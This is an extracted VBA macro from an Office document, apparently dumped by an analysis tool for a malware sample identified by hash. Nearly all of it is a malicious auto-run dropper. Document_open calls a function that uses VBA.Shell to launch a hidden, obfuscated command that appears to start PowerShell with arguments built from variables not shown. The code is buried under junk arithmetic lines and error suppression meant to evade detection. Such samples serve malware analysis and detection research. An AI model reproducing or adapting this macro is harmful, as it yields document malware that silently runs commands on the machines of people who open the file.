Filename     : ./macros/3be9d28f1dc29770e01e9e611452e041f04742b8910059ed26b5797582874ee2
OLE stream   : Macros/VBA/RuGjwzj
VBA filename : RuGjwzj.cls
----------------------------------------
Attribute VB_Name = "RuGjwzj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function pkbIIUU()
On Error Resume Next
GfaYw = AOwJS
qqFLu = Rnd(IDpiLw)
Oqcils = (23041 * Sgn(qijSMG) / 78044 / Lanrt * BYPJO + ChrW(lGVjU) / AuoAiZ * CInt(PfYwH))
URpnzO = 71052 + fPRTB
wOkic = bHwYrr
qiuDV = Rnd(aGGpD)
zKutu = (10034 * Sgn(lCvVPu) / 20868 / KAkocr * HqbiM + ChrW(HfEuJi) / sDSLo * CInt(auSPPi))
cdmAk = 25729 + zMFuR
zvRdo = MvttJi
izwoD = Rnd(KbDER)
ruXlp = (98270 * Sgn(vvXwX) / 53494 / IWUhqP * ETtzO + ChrW(FUzPUo) / jLoLLH * CInt(cDYVGN))
tJdWq = 51669 + MzBGh
inAuYr = qBuaD
DZZMST = Rnd(mbdob)
UawkL = (44756 * Sgn(llAGQt) / 43638 / iGsPq * kMmjFw + ChrW(jtjWEa) / aHMWl * CInt(zzntii))
vbwHb = 68342 + EzhJV
pkbIIUU = FfZkuv + VBA.Shell(jEJwsmisw + Chr(sPAqbR + vbKeyP + psitRRKkwEC) + "owers" + WqBrMduUcI + ccsOTUk + wEaIvzVJR + fcCLAnkZ, 49097 - 49097)
dGmnZ = CbckYw
pHvCK = Rnd(SkOKD)
LsHiMw = (16794 * Sgn(LZrGT) / 17729 / LMEjB * jFfzpS + ChrW(iwahs) / ZTLdYi * CInt(FShuhF))
aKFrU = 70553 + TIkat
OYkQjj = Oitpv
jPPjrz = Rnd(imchXi)
uhiwAz = (57895 * Sgn(EhkTc) / 97714 / PjzpjW * NrRou + ChrW(YfFURl) / RRmfCm * CInt(KqAwG))
mNzKN = 56269 + wAjjCQ
End Function
Private Sub Document_open()
On Error Resume Next
OGWrVh = HZdLU
hzBuAP = Rnd(dTrfM)
QMzZH = (37512 * Sgn(zOkOkt) / 29389 / NBHaNU * XwAKi + ChrW(hVvQuA) / wVYmAp * CInt(AVIGbS))
puZcP = 5123 + ITwtTm
GCoti = Nnzaf
tYVlHh = Rnd(oAZzo)
TRHVwo = (22647 * Sgn(iHjKQi) / 57889 / BvALi * DmLfO + ChrW(obvPSC) / WXWdj * CInt(lpwWi))
Pspwp = 86418 + frcVZY
pkbIIUU
zwVEQ = COtdpu
AiLlBZ = Rnd(FJOVJ)
zwQHBN = (20716 * Sgn(ininE) / 75306 / rajGk * WIoKF + ChrW(QKqUQR) / sRszdS * CInt(MTJmR))
ZjwGL = 32860 + OIHifR
uCzBtu = cnYXhH
unXSz = Rnd(Kicocz)
PdPCjj = (24297 * Sgn(frUvi) / 98735 / Yruujo * pbECDR + ChrW(PujOj) / TjZWHQ * CInt(WHjzLi))
luwnSR = 41483 + uzzbCo
End Sub

